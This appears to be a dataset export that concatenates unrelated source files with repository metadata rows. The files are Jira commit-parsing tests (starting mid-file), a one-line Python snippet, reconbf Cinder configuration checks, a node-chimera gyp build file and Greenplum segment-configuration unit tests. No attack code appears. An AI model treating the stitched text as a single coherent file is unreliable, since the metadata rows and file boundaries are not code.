"09c1983 Merge pull request #25 from ci-cd/revert-18-github-version-fix",
"445fd02 Revert \"GitHub version fix\""
]
def test_extract_story_id_with_two_stories(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
story_list = _jira.extract_story_id_from_commit_messages(commit_example)
assert len(story_list) == 2
commit_example_nested_brackets = [
"223342f Adding ability to specify artifactory user [TEST-101, [bubba]]",
"4326d00 Adding slack channel option for errors [TEST-201]",
"09c1983 Merge pull request #25 from ci-cd/revert-18-github-version-fix",
"445fd02 Revert \"GitHub version fix\""
]
def test_extract_story_id_with_nested_brackets(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
story_list = _jira.extract_story_id_from_commit_messages(commit_example_nested_brackets)
print(str(story_list))
assert len(story_list) == 1
commit_example_multiple_per_brackets = [
"223342f Adding ability to specify artifactory user [TEST-100,TEST-101]",
"4326d00 Adding slack channel option for errors [TEST-98,TEST-99]",
"09c1983 Merge pull request #25 from ci-cd/revert-18-github-version-fix",
"445fd02 Revert \"GitHub version fix\""
]
def test_extract_story_id_with_multiple_per_brackets(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
story_list = _jira.extract_story_id_from_commit_messages(commit_example_multiple_per_brackets)
print(str(story_list))
assert len(story_list) == 4
commit_example_dedup = [
"223342f Adding ability to specify artifactory user [TEST-100,TEST-100]",
"4326d00 Adding slack channel option for errors [TEST-100,TEST-100]",
"09c1983 Merge pull request #25 from ci-cd/revert-18-github-version-fix",
"445fd02 Revert \"GitHub version fix\""
]
def test_extract_story_id_with_dedup(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
story_list = _jira.extract_story_id_from_commit_messages(commit_example_dedup)
print(str(story_list))
assert len(story_list) == 1
def test_flatten_story_details_with_None_story_details(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
flat_story_details = _jira.flatten_story_details(None)
assert flat_story_details is None
def test_flatten_story_details_with_empty_story_details(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
flat_story_details = _jira.flatten_story_details([])
assert len(flat_story_details) == 0
def test_flatten_story_details_with_story_details(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
flat_story_expected = [
{
"story_type" : "bug",
"id" : "TEST-123",
"name" : "Test Bug",
"url" : "http://happy.happy.joy.joy/browse/TEST-123",
"current_state" : "In Progress",
"description" : "This is a test bug description"
},
{
"story_type" : "bug",
"id" : "TEST-456",
"name" : "Another test Bug",
"url" : "http://happy.happy.joy.joy/browse/TEST-456",
"current_state" : "Code Review",
"description" : "Another test bug"
}
]
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
current_test_directory = os.path.dirname(os.path.realpath(__file__))
with open(current_test_directory + "/jira_stories_bug.json", 'r') as myfile:
jira_data = myfile.read()
story_details = json.loads(jira_data).get('stories')
flat_story_details = _jira.flatten_story_details(story_details)
assert flat_story_expected == flat_story_details
for story in flat_story_details:
assert 'story_type' in story
assert 'id' in story
assert 'name' in story
assert 'description' in story
assert 'url' in story
assert 'current_state' in story
| 41.831963 | 161 | 0.636249 | 5,499 | 45,806 | 4.967994 | 0.052737 | 0.025696 | 0.039972 | 0.048538 | 0.940701 | 0.93349 | 0.917676 | 0.898203 | 0.892456 | 0.874154 | 0 | 0.023254 | 0.24237 | 45,806 | 1,094 | 162 | 41.870201 | 0.763947 | 0.000786 | 0 | 0.735169 | 0 | 0.034958 | 0.238398 | 0.028251 | 0 | 0 | 0 | 0 | 0.060381 | 1 | 0.03178 | false | 0 | 0.012712 | 0 | 0.048729 | 0.022246 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0650e3b9b523e8bb9247abbb1e05cf43d48f8694 | 31 | py | Python | 23_pr5_03.py | AmreshTripathy/Python | e86420fef7f52da393be5b50ac2f13bddfeb3306 | [
"Apache-2.0"
] | 4 | 2021-05-27T05:06:09.000Z | 2021-06-12T17:12:47.000Z | 23_pr5_03.py | AmreshTripathy/Python | e86420fef7f52da393be5b50ac2f13bddfeb3306 | [
"Apache-2.0"
] | null | null | null | 23_pr5_03.py | AmreshTripathy/Python | e86420fef7f52da393be5b50ac2f13bddfeb3306 | [
"Apache-2.0"
] | null | null | null | a = {18, '18', 18.1}
print (a) | 15.5 | 21 | 0.451613 | 7 | 31 | 2 | 0.571429 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.291667 | 0.225806 | 31 | 2 | 22 | 15.5 | 0.291667 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
06aa57cf46f7a78ca69e19d1339c2b74f8ad3506 | 8,256 | py | Python | tests/test_cinder.py | fallenpegasus/reconbf | bfd15bef549f011a3de885c3267d4f718223b798 | [
"Apache-2.0"
] | 45 | 2016-08-12T21:37:25.000Z | 2022-03-29T00:21:29.000Z | tests/test_cinder.py | fallenpegasus/reconbf | bfd15bef549f011a3de885c3267d4f718223b798 | [
"Apache-2.0"
] | 20 | 2016-08-11T07:42:28.000Z | 2016-09-09T13:33:47.000Z | tests/test_cinder.py | fallenpegasus/reconbf | bfd15bef549f011a3de885c3267d4f718223b798 | [
"Apache-2.0"
] | 6 | 2016-08-25T06:31:38.000Z | 2019-09-11T04:29:36.000Z | from reconbf.modules import test_cinder
from reconbf.lib.result import Result, TestResult
from reconbf.lib import utils
import pwd
import grp
import unittest
from mock import patch
class ConfigPermissions(unittest.TestCase):
conf = {'dir': '', 'user': '', 'group': ''}
pwd_root = pwd.struct_passwd(('root', 'x', 0, 0, 'root', '/root',
'/bin/bash'))
grp_root = grp.struct_group(('root', 'x', 0, []))
def test_no_user(self):
with patch.object(pwd, 'getpwnam', side_effect=KeyError()):
with patch.object(grp, 'getgrnam', return_value=self.grp_root):
res = test_cinder.config_permission(self.conf)
self.assertEqual(res.result, Result.SKIP)
def test_no_group(self):
with patch.object(pwd, 'getpwnam', return_value=self.pwd_root):
with patch.object(grp, 'getgrnam', side_effect=KeyError()):
res = test_cinder.config_permission(self.conf)
self.assertEqual(res.result, Result.SKIP)
def test_good_perm(self):
with patch.object(pwd, 'getpwnam', return_value=self.pwd_root):
with patch.object(grp, 'getgrnam', return_value=self.grp_root):
with patch.object(utils, 'validate_permissions',
return_value=TestResult(Result.PASS)):
res = test_cinder.config_permission(self.conf)
self.assertEqual(res.result, Result.PASS)
def test_bad_perm(self):
with patch.object(pwd, 'getpwnam', return_value=self.pwd_root):
with patch.object(grp, 'getgrnam', return_value=self.grp_root):
with patch.object(utils, 'validate_permissions',
return_value=TestResult(Result.FAIL)):
res = test_cinder.config_permission(self.conf)
self.assertEqual(res.result, Result.FAIL)
class CinderAuth(unittest.TestCase):
conf = {'dir': ''}
def test_no_config(self):
with patch.object(utils, 'parse_openstack_ini',
side_effect=EnvironmentError()):
res = test_cinder.cinder_auth(self.conf)
self.assertEqual(res.result, Result.SKIP)
def _run_with_config(self, os_ini):
with patch.object(utils, 'parse_openstack_ini', return_value=os_ini):
return test_cinder.cinder_auth(self.conf)
def test_keystone(self):
res = self._run_with_config({'DEFAULT': {'auth_strategy': 'keystone'}})
self.assertEqual(res.result, Result.PASS)
def test_other(self):
res = self._run_with_config({'DEFAULT': {'auth_strategy': 'other'}})
self.assertEqual(res.result, Result.FAIL)
class KeystoneSecure(unittest.TestCase):
conf = {'dir': ''}
def test_no_config(self):
with patch.object(utils, 'parse_openstack_ini',
side_effect=EnvironmentError()):
res = test_cinder.keystone_secure(self.conf)
self.assertEqual(res.result, Result.SKIP)
def _run_with_config(self, os_ini):
with patch.object(utils, 'parse_openstack_ini', return_value=os_ini):
res = test_cinder.keystone_secure(self.conf)
return res
def test_bad_proto(self):
res = self._run_with_config({'keystone_authtoken': {
'auth_protocol': 'http',
'identity_uri': 'https://abc'}})
self.assertEqual(res.result, Result.FAIL)
def test_bad_uri(self):
res = self._run_with_config({'keystone_authtoken': {
'auth_protocol': 'https',
'identity_uri': 'http://abc'}})
self.assertEqual(res.result, Result.FAIL)
def test_ok(self):
res = self._run_with_config({'keystone_authtoken': {
'auth_protocol': 'https',
'identity_uri': 'https://abc'}})
self.assertEqual(res.result, Result.PASS)
class NovaSecure(unittest.TestCase):
conf = {'dir': ''}
def test_no_config(self):
with patch.object(utils, 'parse_openstack_ini',
side_effect=EnvironmentError()):
res = test_cinder.nova_secure(self.conf)
self.assertEqual(res.result, Result.SKIP)
def _run_with_config(self, os_ini):
with patch.object(utils, 'parse_openstack_ini', return_value=os_ini):
res = test_cinder.nova_secure(self.conf)
return res
def test_bad(self):
res = self._run_with_config({'DEFAULT': {
'nova_api_insecure': 'true'}})
self.assertEqual(res.result, Result.FAIL)
def test_ok(self):
res = self._run_with_config({'DEFAULT': {
'nova_api_insecure': 'false'}})
self.assertEqual(res.result, Result.PASS)
class GlanceSecure(unittest.TestCase):
conf = {'dir': ''}
def test_no_config(self):
with patch.object(utils, 'parse_openstack_ini',
side_effect=EnvironmentError()):
res = test_cinder.glance_secure(self.conf)
self.assertEqual(res.result, Result.SKIP)
def _run_with_config(self, os_ini):
with patch.object(utils, 'parse_openstack_ini', return_value=os_ini):
res = test_cinder.glance_secure(self.conf)
return res
def test_bad(self):
res = self._run_with_config({'DEFAULT': {
'glance_api_insecure': 'true'}})
self.assertEqual(res.result, Result.FAIL)
def test_ok(self):
res = self._run_with_config({'DEFAULT': {
'glance_api_insecure': 'false'}})
self.assertEqual(res.result, Result.PASS)
class NasSecurity(unittest.TestCase):
conf = {'dir': ''}
def test_no_config(self):
with patch.object(utils, 'parse_openstack_ini',
side_effect=EnvironmentError()):
res = test_cinder.nas_security(self.conf)
self.assertEqual(res.result, Result.SKIP)
def _run_with_config(self, os_ini):
with patch.object(utils, 'parse_openstack_ini', return_value=os_ini):
res = test_cinder.nas_security(self.conf)
return res
def test_bad_ops(self):
res = self._run_with_config({'DEFAULT': {
'nas_secure_file_operations': 'false',
'nas_secure_file_permissions': 'auto'}})
self.assertEqual(res.result, Result.FAIL)
def test_bad_perm(self):
res = self._run_with_config({'DEFAULT': {
'nas_secure_file_operations': 'auto',
'nas_secure_file_permissions': 'false'}})
self.assertEqual(res.result, Result.FAIL)
def test_ok(self):
res = self._run_with_config({'DEFAULT': {
'nas_secure_file_operations': 'auto',
'nas_secure_file_permissions': 'auto'}})
self.assertEqual(res.result, Result.PASS)
def test_ok_default(self):
res = self._run_with_config({'DEFAULT': {}})
self.assertEqual(res.result, Result.PASS)
class BodySize(unittest.TestCase):
conf = {'dir': ''}
def test_no_config(self):
with patch.object(utils, 'parse_openstack_ini',
side_effect=EnvironmentError()):
res = test_cinder.body_size(self.conf)
self.assertEqual(res.result, Result.SKIP)
def _run_with_config(self, os_ini):
with patch.object(utils, 'parse_openstack_ini', return_value=os_ini):
res = test_cinder.body_size(self.conf)
return res
def test_bad_def(self):
res = self._run_with_config({
'DEFAULT': {'osapi_max_request_body_size': '114688'},
'oslo_middleware': {'max_request_body_size': '999999'}})
self.assertEqual(res.result, Result.FAIL)
def test_bad_middle(self):
res = self._run_with_config({
'DEFAULT': {'osapi_max_request_body_size': '999999'},
'oslo_middleware': {'max_request_body_size': '114688'}})
self.assertEqual(res.result, Result.FAIL)
def test_ok(self):
res = self._run_with_config({
'DEFAULT': {'osapi_max_request_body_size': '114688'},
'oslo_middleware': {'max_request_body_size': '114688'}})
self.assertEqual(res.result, Result.PASS)
def test_ok_default(self):
res = self._run_with_config({})
self.assertEqual(res.result, Result.PASS)
| 37.022422 | 79 | 0.627786 | 985 | 8,256 | 4.979695 | 0.103553 | 0.038532 | 0.099083 | 0.13211 | 0.901733 | 0.897859 | 0.876045 | 0.82895 | 0.811621 | 0.76106 | 0 | 0.006259 | 0.245276 | 8,256 | 222 | 80 | 37.189189 | 0.780934 | 0 | 0 | 0.724138 | 0 | 0 | 0.144743 | 0.036701 | 0 | 0 | 0 | 0 | 0.155172 | 1 | 0.189655 | false | 0.063218 | 0.04023 | 0 | 0.356322 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
88cfe0f3d2562ac58d43d7c439be586a8518f9ba | 1,552 | gyp | Python | binding.gyp | legnaleurc/node-chimera | e51b94ffe8730a93f07549e55413cc84fc43549f | [
"MIT"
] | 1 | 2015-04-19T23:32:57.000Z | 2015-04-19T23:32:57.000Z | binding.gyp | legnaleurc/node-chimera | e51b94ffe8730a93f07549e55413cc84fc43549f | [
"MIT"
] | null | null | null | binding.gyp | legnaleurc/node-chimera | e51b94ffe8730a93f07549e55413cc84fc43549f | [
"MIT"
] | null | null | null | {
'targets': [
{
'target_name': 'chimera',
'sources': [
'src/top.cc',
'src/cookiejar.cc',
'src/chimera.cc',
'src/browser.cc'
],
'conditions': [
['OS=="mac"', {
'include_dirs': [
'qt_compiled/include',
'qt_compiled/include/QtCore',
'qt_compiled/include/QtGui',
'qt_compiled/include/QtNetwork',
'qt_compiled/include/QtWebkit'
],
'libraries': [
'-framework AppKit',
'../qt_compiled/lib/libQtGui.a',
'../qt_compiled/lib/libQtCore.a',
'../qt_compiled/lib/libQtNetwork.a',
'../qt_compiled/lib/libQtWebKit.a',
'../qt_compiled/lib/libjscore.a',
'../qt_compiled/lib/libwebcore.a',
'../qt_compiled/lib/libQtXml.a'
],
}],
['OS=="linux"', {
'include_dirs': [
'qt_compiled/include',
'qt_compiled/include/QtCore',
'qt_compiled/include/QtGui',
'qt_compiled/include/QtNetwork',
'qt_compiled/include/QtWebKit'
],
'libraries': [
'../qt_compiled/lib/libQtCore.a',
'../qt_compiled/lib/libQtGui.a',
'../qt_compiled/lib/libQtXml.a',
'../qt_compiled/lib/libQtNetwork.a',
'../qt_compiled/lib/libQtWebKit.a',
'../qt_compiled/lib/libwebcore.a',
'../qt_compiled/lib/libjscore.a'
],
}]
]
}
]
}
| 29.283019 | 48 | 0.474871 | 138 | 1,552 | 5.144928 | 0.246377 | 0.338028 | 0.256338 | 0.23662 | 0.839437 | 0.839437 | 0.788732 | 0.788732 | 0.64507 | 0.557746 | 0 | 0 | 0.353737 | 1,552 | 52 | 49 | 29.846154 | 0.707876 | 0 | 0 | 0.519231 | 0 | 0 | 0.552191 | 0.414948 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
00105fd64c90c6c1626745900ad3ef30f5bb34a2 | 9,937 | py | Python | gpMgmt/bin/gppylib/operations/test/unit/test_unit_configurationImplGpdb.py | haolinw/gpdb | 16a9465747a54f0c61bac8b676fe7611b4f030d8 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | gpMgmt/bin/gppylib/operations/test/unit/test_unit_configurationImplGpdb.py | haolinw/gpdb | 16a9465747a54f0c61bac8b676fe7611b4f030d8 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | gpMgmt/bin/gppylib/operations/test/unit/test_unit_configurationImplGpdb.py | haolinw/gpdb | 16a9465747a54f0c61bac8b676fe7611b4f030d8 | [
"PostgreSQL",
"Apache-2.0"
] | 1 | 2022-03-18T03:08:11.000Z | 2022-03-18T03:08:11.000Z | #!/usr/bin/env python3
import unittest
from gppylib.gparray import GpArray, Segment
from gppylib.system.configurationImplGpdb import GpConfigurationProviderUsingGpdbCatalog
from mock import Mock, patch
class ConfigurationImplGpdbTestCase(unittest.TestCase):
def setUp(self):
self.maxDiff = None
self.configProvider = GpConfigurationProviderUsingGpdbCatalog()
self.conn = Mock()
self.coordinator = Segment.initFromString("1|-1|p|p|s|u|cdw|cdw|5432|/data/coordinator")
self.primary0 = Segment.initFromString("2|0|p|p|s|u|sdw1|sdw1|40000|/data/primary0")
self.primary1 = Segment.initFromString("3|1|p|p|s|u|sdw2|sdw2|40001|/data/primary1")
self.mirror0 = Segment.initFromString("4|0|m|m|s|u|sdw2|sdw2|50000|/data/mirror0")
self.acting_mirror0 = Segment.initFromString("6|0|m|p|d|n|sdw2|sdw2|50002|/data/acting_mirror0")
self.mirror1 = Segment.initFromString("5|1|m|m|s|u|sdw1|sdw1|50001|/data/mirror1")
segments = [self.coordinator,self.primary0,self.primary1,self.mirror0,self.mirror1]
self.gpArray = GpArray(segments)
self.gpArray.setSegmentsAsLoadedFromDb(segments)
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', return_value=[6])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigRemoveMirror_remove_acting_mirror(self, mockInsert, mockFetch):
addSQL = self.configProvider.updateSystemConfigRemoveMirror(self.conn, self.gpArray, self.acting_mirror0, "foo")
self.assertEqual(addSQL, "SELECT gp_add_segment(6::int2, 0::int2, 'm', 'p', 'n', 'd', 50002, 'sdw2', 'sdw2', '/data/acting_mirror0');\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t6,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 6'\n)")
mockFetch.assert_called_with(self.conn, "SELECT gp_remove_segment_mirror(0::int2)")
mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 6,\n 'foo: removed mirror segment configuration'\n)", 1)
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', return_value=[4])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigRemoveMirror_remove_actual_mirror(self, mockInsert, mockFetch):
addSQL = self.configProvider.updateSystemConfigRemoveMirror(self.conn, self.gpArray, self.mirror0, "foo")
self.assertEqual(addSQL, "SELECT gp_add_segment(4::int2, 0::int2, 'm', 'm', 'n', 'd', 50000, 'sdw2', 'sdw2', '/data/mirror0');\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t4,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 4'\n)")
mockFetch.assert_called_with(self.conn, "SELECT gp_remove_segment_mirror(0::int2)")
mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 4,\n 'foo: removed mirror segment configuration'\n)", 1)
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', return_value=[2])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigRemovePrimary(self, mockInsert, mockFetch):
addSQL = self.configProvider.updateSystemConfigRemovePrimary(self.conn, self.gpArray, self.primary0, "foo")
self.assertEqual(addSQL, "SELECT gp_add_segment(2::int2, 0::int2, 'm', 'm', 'n', 'd', 40000, 'sdw1', 'sdw1', '/data/primary0');\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t2,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 2'\n)")
mockFetch.assert_called_with(self.conn, "SELECT gp_remove_segment(2::int2)")
mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 2,\n 'foo: removed primary segment configuration'\n)", 1)
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', return_value=[6])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigAddMirror_add_acting_mirror(self, mockInsert, mockFetch):
removeSQL = self.configProvider.updateSystemConfigAddMirror(self.conn, self.gpArray, self.acting_mirror0, "foo")
self.assertEqual(removeSQL, "SELECT gp_remove_segment(6::int2);\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t6,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 6'\n)")
mockFetch.assert_called_with(self.conn, "SELECT gp_add_segment(6::int2, 0::int2, 'm', 'm', 'n', 'd', 50002, 'sdw2', 'sdw2', '/data/acting_mirror0')")
mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 6,\n 'foo: inserted mirror segment configuration'\n)", 1)
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', return_value=[4])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigAddMirror_add_actual_mirror(self, mockInsert, mockFetch):
removeSQL = self.configProvider.updateSystemConfigAddMirror(self.conn, self.gpArray, self.mirror0, "foo")
self.assertEqual(removeSQL, "SELECT gp_remove_segment(4::int2);\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t4,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 4'\n)")
mockFetch.assert_called_with(self.conn, "SELECT gp_add_segment(4::int2, 0::int2, 'm', 'm', 'n', 'd', 50000, 'sdw2', 'sdw2', '/data/mirror0')")
mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 4,\n 'foo: inserted mirror segment configuration'\n)", 1)
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', side_effect=[ [2], [0] ])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigAddPrimary(self, mockInsert, mockFetch):
removeSQL = self.configProvider.updateSystemConfigAddPrimary(self.conn, self.gpArray, self.primary0, "foo", {0: self.mirror0})
self.assertEqual(removeSQL, "SELECT gp_remove_segment_mirror(0::int2);\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t2,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 2'\n)")
mockFetch.assert_any_call(self.conn, "SELECT content FROM pg_catalog.gp_segment_configuration WHERE dbId = 2")
mockFetch.assert_any_call(self.conn, "SELECT gp_add_segment(2::int2, 0::int2, 'p', 'p', 'n', 'u', 40000, 'sdw1', 'sdw1', '/data/primary0')")
mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 2,\n 'foo: inserted primary segment configuration with contentid 0'\n)", 1)
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', return_value=[6])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigRemoveAddMirror_remove_acting_mirror(self, mockInsert, mockFetch):
addSQL, removeSQL = self.configProvider.updateSystemConfigRemoveAddMirror(self.conn, self.gpArray, self.acting_mirror0, "foo")
self.assertEqual(addSQL, "SELECT gp_add_segment(6::int2, 0::int2, 'm', 'p', 'n', 'd', 50002, 'sdw2', 'sdw2', '/data/acting_mirror0');\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t6,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 6'\n)")
self.assertEqual(removeSQL, "SELECT gp_remove_segment(6::int2)")
mockFetch.assert_any_call(self.conn, "SELECT gp_remove_segment_mirror(0::int2)")
mockFetch.assert_any_call(self.conn, "SELECT gp_add_segment(6::int2, 0::int2, 'm', 'm', 'n', 'd', 50002, 'sdw2', 'sdw2', '/data/acting_mirror0')")
mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 6,\n 'foo: inserted segment configuration for full recovery or original dbid 6'\n)", 1)
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', return_value=[4])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigRemoveAddMirror_remove_actual_mirror(self, mockInsert, mockFetch):
addSQL, removeSQL = self.configProvider.updateSystemConfigRemoveAddMirror(self.conn, self.gpArray, self.mirror0, "foo")
self.assertEqual(addSQL, "SELECT gp_add_segment(4::int2, 0::int2, 'm', 'm', 'n', 'd', 50000, 'sdw2', 'sdw2', '/data/mirror0');\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t4,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 4'\n)")
self.assertEqual(removeSQL, "SELECT gp_remove_segment(4::int2)")
mockFetch.assert_any_call(self.conn, "SELECT gp_remove_segment_mirror(0::int2)")
mockFetch.assert_any_call(self.conn, "SELECT gp_add_segment(4::int2, 0::int2, 'm', 'm', 'n', 'd', 50000, 'sdw2', 'sdw2', '/data/mirror0')")
mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 4,\n 'foo: inserted segment configuration for full recovery or original dbid 4'\n)", 1)
